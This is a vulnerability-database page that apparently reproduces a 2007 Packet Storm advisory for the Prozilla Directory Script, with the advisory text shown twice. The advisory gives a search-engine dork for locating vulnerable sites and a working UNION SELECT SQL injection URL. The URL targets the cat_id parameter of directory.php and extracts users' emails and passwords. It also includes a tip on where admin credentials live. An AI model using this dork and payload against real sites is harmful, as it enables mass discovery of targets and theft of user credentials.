Lucene search

K

prozilla-sql.txt

🗓️ 17 Jul 2007 00:00:00Reported by t0pp8uzzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Prozilla Directory Script SQL Injection Vulnerability, able to retrieve user email/password

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`--==+================================================================================+==--  
--==+ Prozilla Directory Script SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
  
  
AUTHOR: t0pP8uZz & xprog  
SITE: http://www.prozilla.com/  
DORK: allinurl:directory.php?ax=list  
  
  
DESCRIPTION:   
SQL injection in cat_id of directory.php among others. Able to retrieve email/passwords  
of users who posted URLs in the directory.  
  
  
EXPLOITS:  
http://www.site.com/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E,email,0x3a,password),6,7,8,9,10,0x223E3C212D2D,12,13/**/from/**/links/*  
  
  
NOTE/TIP:   
Doesnt look like admin info is stored in the database, must be config.  
  
  
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !  
  
  
--==+================================================================================+==--  
--==+ Prozilla Directory Script SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
--==+================================================================================+==--  
--==+ Prozilla Directory Script SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
  
  
AUTHOR: t0pP8uZz & xprog  
SITE: http://www.prozilla.com/  
DORK: allinurl:directory.php?ax=list  
  
  
DESCRIPTION:   
SQL injection in cat_id of directory.php among others. Able to retrieve email/passwords  
of users who posted URLs in the directory.  
  
  
EXPLOITS:  
http://www.site.com/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E,email,0x3a,password),6,7,8,9,10,0x223E3C212D2D,12,13/**/from/**/links/*  
  
  
NOTE/TIP:   
Doesnt look like admin info is stored in the database, must be config.  
  
  
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !  
  
  
--==+================================================================================+==--  
--==+ Prozilla Directory Script SQL Injection Vulnerbility +==--  
--==+================================================================================+==--  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
27
.json
Report